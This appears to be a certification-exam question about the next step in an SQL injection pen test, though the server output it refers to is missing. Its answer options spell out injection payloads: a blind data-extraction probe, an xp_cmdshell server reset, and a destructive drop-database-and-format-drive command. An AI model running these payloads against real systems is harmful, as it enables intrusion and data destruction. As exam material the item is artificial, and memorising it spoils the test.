You are conducting pen-test against a company’s website using SQL Injection techniques. You enter “anything’ or 1=1 ” in the username field of an authentication form. This is the output returned from the server.
What is the next step to be done?
A.
Identify the user context of the web application by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND USER_NAME() = ‘dbo’
B.
Reboot the web server by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell ‘iisreset – reboot’; —
C.
Delete the database and format the C: drive by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND drop database myDB; xp_cmdshell ‘format c: /q /yes ‘; —
D.
Identify the database and table name by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype=’U’),1))) > 109